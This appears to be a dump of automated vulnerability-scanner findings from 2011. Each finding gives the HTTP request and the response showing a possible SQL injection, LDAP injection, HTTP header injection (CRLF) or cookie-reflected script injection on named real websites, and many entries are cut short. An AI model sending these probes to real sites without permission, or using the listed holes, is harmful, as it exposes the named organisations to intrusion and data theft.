HTTP/1.1 404 Not Found Server: Apache/2.2 Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Date: Fri, 06 May 2011 19:12:40 GMT Connection: Keep-Alive Content-Length: 27720 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> < ...[SNIP]... </b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br> ...[SNIP]... |
GET /financing/images Host: www.millerwelds.com Proxy-Connection: keep-alive Referer: http://www.millerwelds User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=94003201 |
HTTP/1.1 404 Not Found Server: Apache/2.2 Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Date: Fri, 06 May 2011 19:12:41 GMT Connection: Keep-Alive Content-Length: 29451 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> < ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.millerwelds |
Path: | /financing/index.php |
GET /financing'/index.php HTTP/1.1 Host: www.millerwelds.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=94003201 |
HTTP/1.1 404 Not Found Server: Apache/2.2 Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Date: Fri, 06 May 2011 19:16:42 GMT Connection: Keep-Alive Set-Cookie: X-Mapping-chcfmbmj Content-Length: 27703 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> < ...[SNIP]... </b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br> ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.millerwelds |
Path: | /financing/index.php |
GET /financing/index.php' HTTP/1.1 Host: www.millerwelds.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=94003201 |
HTTP/1.1 404 Not Found Server: Apache/2.2 Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Date: Fri, 06 May 2011 19:17:06 GMT Connection: Keep-Alive Set-Cookie: X-Mapping-chcfmbmj Content-Length: 27724 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> < ...[SNIP]... </b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/financing/index.php''' at line 1)<br> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.millerwelds |
Path: | /financing/index.php |
GET /financing/index.php?1'=1 HTTP/1.1 Host: www.millerwelds.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=94003201 |
HTTP/1.1 200 OK Server: Apache/2.2 Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Date: Fri, 06 May 2011 19:15:50 GMT Connection: Keep-Alive Set-Cookie: X-Mapping-chcfmbmj Content-Length: 13812 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html><!-- InstanceBegin template="blank.dwt" codeOutsideHTMLIsLocked= ...[SNIP]... </b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br> ...[SNIP]... |
GET /financing/index.php?1''=1 HTTP/1.1 Host: www.millerwelds.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=94003201 |
HTTP/1.1 200 OK Server: Apache/2.2 Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Date: Fri, 06 May 2011 19:15:51 GMT Connection: Keep-Alive Set-Cookie: X-Mapping-chcfmbmj Content-Length: 15555 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html><!-- InstanceBegin template="blank.dwt" codeOutsideHTMLIsLocked= ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.millerwelds |
Path: | /images/footer-bootm-bg |
GET /images'/footer-bootm-bg.jpg?9 HTTP/1.1 Host: www.millerwelds.com Proxy-Connection: keep-alive Referer: http://www.millerwelds User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=94003201 |
HTTP/1.1 404 Not Found Server: Apache/2.2 Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Date: Fri, 06 May 2011 19:18:06 GMT Connection: Keep-Alive Content-Length: 27711 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> < ...[SNIP]... </b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?9'' at line 1)<br> ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.millerwelds |
Path: | /images/footer-bootm-bg |
GET /images/footer-bootm-bg Host: www.millerwelds.com Proxy-Connection: keep-alive Referer: http://www.millerwelds User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=94003201 |
HTTP/1.1 404 Not Found Server: Apache/2.2 Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Date: Fri, 06 May 2011 19:18:30 GMT Connection: Keep-Alive Content-Length: 27710 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> < ...[SNIP]... </b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?9'' at line 1)<br> ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.millerwelds |
Path: | /images/footer-top-bg.jpg |
GET /images'/footer-top-bg.jpg?2 HTTP/1.1 Host: www.millerwelds.com Proxy-Connection: keep-alive Referer: http://www.millerwelds User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=94003201 |
HTTP/1.1 404 Not Found Server: Apache/2.2 Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Date: Fri, 06 May 2011 19:18:09 GMT Connection: Keep-Alive Content-Length: 27709 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> < ...[SNIP]... </b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?2'' at line 1)<br> ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.millerwelds |
Path: | /images/footer-top-bg.jpg |
GET /images/footer-top-bg.jpg'?2 HTTP/1.1 Host: www.millerwelds.com Proxy-Connection: keep-alive Referer: http://www.millerwelds User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=94003201 |
HTTP/1.1 404 Not Found Server: Apache/2.2 Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Date: Fri, 06 May 2011 19:18:34 GMT Connection: Keep-Alive Content-Length: 27708 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> < ...[SNIP]... </b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?2'' at line 1)<br> ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.millerwelds |
Path: | /images/header-background |
GET /images'/header-background.jpg?3 HTTP/1.1 Host: www.millerwelds.com Proxy-Connection: keep-alive Referer: http://www.millerwelds User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=94003201 |
HTTP/1.1 404 Not Found Server: Apache/2.2 Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Date: Fri, 06 May 2011 19:18:34 GMT Connection: Keep-Alive Content-Length: 27713 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> < ...[SNIP]... </b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?3'' at line 1)<br> ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.millerwelds |
Path: | /images/header-background |
GET /images/header-background Host: www.millerwelds.com Proxy-Connection: keep-alive Referer: http://www.millerwelds User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=94003201 |
HTTP/1.1 404 Not Found Server: Apache/2.2 Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Date: Fri, 06 May 2011 19:18:58 GMT Connection: Keep-Alive Content-Length: 27712 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> < ...[SNIP]... </b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?3'' at line 1)<br> ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.nutter.com |
Path: | /attorneys.php |
GET /attorneys.php?AttorneyID Host: www.nutter.com Proxy-Connection: keep-alive Referer: http://www.nutter.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 19:15:26 GMT Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) PHP/4.4.9 with Suhosin-Patch X-Powered-By: PHP/4.4.9 Content-Type: text/html Content-Length: 9631 error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1 | 1064<BR>sql: SELECT FirstName,LastName,Mid ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.nutter.com |
Path: | /careers.php |
GET /careers.php?CategoryID Host: www.nutter.com Proxy-Connection: keep-alive Referer: http://www.nutter.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 19:19:42 GMT Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) PHP/4.4.9 with Suhosin-Patch X-Powered-By: PHP/4.4.9 Content-Type: text/html Content-Length: 8510 <!-- careers start --> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <div id="mainContent"> error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' LIMIT 1' at line 1 | 1064<BR> ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.nutter.com |
Path: | /careers.php |
GET /careers.php?CategoryID Host: www.nutter.com Proxy-Connection: keep-alive Referer: http://www.nutter.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 19:18:45 GMT Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) PHP/4.4.9 with Suhosin-Patch X-Powered-By: PHP/4.4.9 Content-Type: text/html Content-Length: 17285 <!-- careers start --> error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1 | 1064<BR>sql: SELEC ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.socialfollow |
Path: | /button/image/ |
GET /button/image/?b=1' HTTP/1.1 Host: www.socialfollow.com Proxy-Connection: keep-alive Referer: http://www.socialfollow Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=131048717 |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 17:40:55 GMT Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8 X-Powered-By: PHP/5.2.4-2ubuntu5.12 Content-Length: 1288 Content-Type: text/html <br /> <b>Warning</b>: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in <b>/var/www/vhosts <b ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.dominione |
Path: | /main/do/Careers |
GET /main/do/*)(sn=* HTTP/1.1 Host: www.dominionenterprises Proxy-Connection: keep-alive Referer: http://dominionenter User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vnum=1307317138614%26vn |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 19:36:26 GMT X-Powered-By: PHP/4.4.2 Set-Cookie: PHPSESSID=ec8318b7ec Pragma: no-cache Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Fri, 06 May 2011 19:36:26 GMT Cache-Control: no-store, must-revalidate Cache-Control: post-check=-1, pre-check=-1 Content-Length: 0 Content-Type: text/html Set-Cookie: TSa27990=3889173c833 |
GET /main/do/*)!(sn=* HTTP/1.1 Host: www.dominionenterprises Proxy-Connection: keep-alive Referer: http://dominionenter User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vnum=1307317138614%26vn |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 19:36:27 GMT Server: Apache/2.0.59 (Unix) DAV/2 PHP/4.4.2 X-Powered-By: PHP/4.4.2 Set-Cookie: PHPSESSID=fbdf302905 Pragma: no-cache Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Fri, 06 May 2011 19:36:27 GMT Cache-Control: no-store, must-revalidate Cache-Control: post-check=-1, pre-check=-1 Content-Length: 0 Content-Type: text/html |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.hunton.com |
Path: | /professionals/uniGC.aspx |
GET /professionals/uniGC.aspx Host: www.hunton.com Proxy-Connection: keep-alive Referer: http://www.hunton.com X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 00:13:21 GMT Server: Microsoft-IIS/6.0 x-geoloc: 05 x-client: 000040 x-apptype: 01 x-prodtype: 01 x-public: 1 x-redirect: 0 x-occurrence: 01 x-server: EG-H1WS-A09 X-UA-Compatible: IE=EmulateIE7 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=7483b893-e478 Set-Cookie: DefaultCulture=en-US; path=/ Set-Cookie: Mode=1; path=/ Set-Cookie: EventingStatus=1; path=/ Set-Cookie: NavId=1846; path=/ Set-Cookie: PortletId=5983402; path=/ Set-Cookie: SiteId=1837; path=/ Set-Cookie: SERVER_PORT=80; path=/ Set-Cookie: Localization=TimeZone=0 Set-Cookie: ZoneId=7; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 43380 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <tit ...[SNIP]... zBiM3mkuwdaUcjKasqgc ...[SNIP]... |
GET /professionals/uniGC.aspx Host: www.hunton.com Proxy-Connection: keep-alive Referer: http://www.hunton.com X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 00:13:26 GMT Server: Microsoft-IIS/6.0 x-geoloc: 05 x-client: 000040 x-apptype: 01 x-prodtype: 01 x-public: 1 x-redirect: 0 x-occurrence: 01 x-server: EG-H1WS-A09 X-UA-Compatible: IE=EmulateIE7 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=7483b893-e478 Set-Cookie: DefaultCulture=en-US; path=/ Set-Cookie: Mode=1; path=/ Set-Cookie: EventingStatus=1; path=/ Set-Cookie: NavId=1846; path=/ Set-Cookie: PortletId=5983402; path=/ Set-Cookie: SiteId=1837; path=/ Set-Cookie: SERVER_PORT=80; path=/ Set-Cookie: Localization=TimeZone=0 Set-Cookie: ZoneId=7; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 43390 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <tit ...[SNIP]... zBiM3mkuwdaUcjKasqgc ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adj/N5315.277603 |
GET /76cff%0d%0a99e4fb0fdd0/N5315.277603.HORSER Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.horseraci User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __gads=ID=3cde97f19b |
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/76cff 99e4fb0fdd0/N5315.277603.HORSER Date: Sat, 07 May 2011 20:41:53 GMT Server: GFE/2.0 <h1>Error 302 Moved Temporarily</h1> |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adj/scmag.hmktus/sc |
GET /46fd5%0d%0a3cd3e079b91/scmag.hmktus/sc.other Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.scmagazineus User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __gads=ID=3cde97f19b |
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/46fd5 3cd3e079b91/scmag.hmktus/sc.other Date: Fri, 06 May 2011 21:52:20 GMT Server: GFE/2.0 <h1>Error 302 Moved Temporarily</h1> |
Severity: | High |
Confidence: | Certain |
Host: | http://bidder.mathtag.com |
Path: | /iframe/notify |
GET /iframe/notify?exch=9e08b%0d%0a339589a3e58&id=5aW95q2jLzEvUTBG Host: bidder.mathtag.com Proxy-Connection: keep-alive Referer: http://googleads.g User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: uuid=4dab7d35-b1d2-915a |
HTTP/1.1 404 Not found Date: Sat, 07 May 2011 18:11:43 GMT Server: MMBD/3.5.5 Content-Type: text/html; charset=utf-8 Content-Length: 18 x-mm-debug: exchange not found - 9e08b 339589a3e58 x-mm-host: ewr-bidder-x1 Connection: keep-alive Request not found |
Severity: | High |
Confidence: | Certain |
Host: | http://d.xp1.ru4.com |
Path: | /activity |
GET /activity?_o=62795&_t=cm Host: d.xp1.ru4.com Proxy-Connection: keep-alive Referer: http://tags.bluekai.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: X1ID=AM-00000000030620452 |
HTTP/1.1 302 Moved Temporarily Server: Sun-Java-System-Web Date: Fri, 06 May 2011 22:33:42 GMT P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI" Pragma: no-cache Set-cookie: O62795=0; domain=.ru4.com; path=/; expires=Mon, 01-Jan-1970 12:00:00 GMT Location: http://65753 be7cf5083b Content-length: 0 Connection: close |
Severity: | High |
Confidence: | Certain |
Host: | http://learn.bridgefront |
Path: | /sendpassword |
GET /sendpassword?button1=Get Host: learn.bridgefront.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=199010044 |
HTTP/1.1 302 Moved Temporarily Date: Fri, 06 May 2011 23:00:19 GMT Server: Apache/2.2.3 (Red Hat) Set-Cookie: JSESSIONID=7FF0975F9 Location: http://learn.bridgefront c733422f1d&email=3 Content-Length: 0 Connection: close Content-Type: text/plain; charset=UTF-8 |
Severity: | High |
Confidence: | Certain |
Host: | http://480-adver-view |
Path: | /c3VTabstrct-6-2.php |
GET /c3VTabstrct-6-2.php?id Host: 480-adver-view.c3metrics Proxy-Connection: keep-alive Referer: http://c5.zedo.com/jsc/c5 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: C3UID=13014572191303 |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 18:10:48 GMT Server: Apache P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Cache-Control: no-cache Expires: -1 Set-Cookie: 480c8274<script>alert(1)< Set-Cookie: 480c8274<script>alert(1)< Set-Cookie: 480c8274<script>alert(1)< Content-Length: 6697 Connection: close Content-Type: text/html if(!window.c3VTconsts) ...[SNIP]... ar.c3VJScollection[a]=new c3VTJSInter();this ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://480-adver-view |
Path: | /c3VTabstrct-6-2.php |
GET /c3VTabstrct-6-2.php?id Host: 480-adver-view.c3metrics Proxy-Connection: keep-alive Referer: http://c5.zedo.com/jsc/c5 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: C3UID=13014572191303 |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 18:10:46 GMT Server: Apache P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Cache-Control: no-cache Expires: -1 Set-Cookie: 480-SM=adver_05-02-2011 Set-Cookie: 480-VT=adver_05-05-2011 Set-Cookie: 480-nUID=adver6ad07 Content-Length: 6700 Connection: close Content-Type: text/html if(!window.c3VTconsts) ...[SNIP]... ar.c3VJScollection[a] ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://480-adver-view |
Path: | /c3VTabstrct-6-2.php |
GET /c3VTabstrct-6-2.php?id Host: 480-adver-view.c3metrics Proxy-Connection: keep-alive Referer: http://c5.zedo.com/jsc/c5 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: C3UID=13014572191303 |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 18:11:03 GMT Server: Apache P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Cache-Control: no-cache Expires: -1 Set-Cookie: 480-SM=adver_05-02-2011 Set-Cookie: 480-VT=aol_05-05-2011-12 Set-Cookie: 480-nUID=adver_17122 Content-Length: 6680 Connection: close Content-Type: text/html if(!window.c3VTconsts) ...[SNIP]... c3VJSnuid='171221318 ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://480-adver-view |
Path: | /c3VTabstrct-6-2.php |
GET /c3VTabstrct-6-2.php?id Host: 480-adver-view.c3metrics Proxy-Connection: keep-alive Referer: http://c5.zedo.com/jsc/c5 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: C3UID=13014572191303 |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 18:10:51 GMT Server: Apache P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Cache-Control: no-cache Expires: -1 Set-Cookie: 480-SM=adver_05-02-2011 Set-Cookie: 480-VT=aol_05-05-2011-12 Set-Cookie: 480-nUID=adver_10220 Content-Length: 6699 Connection: close Content-Type: text/html if(!window.c3VTconsts) ...[SNIP]... 72191303613803';this ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://480-adver-view |
Path: | /c3VTabstrct-6-2.php |
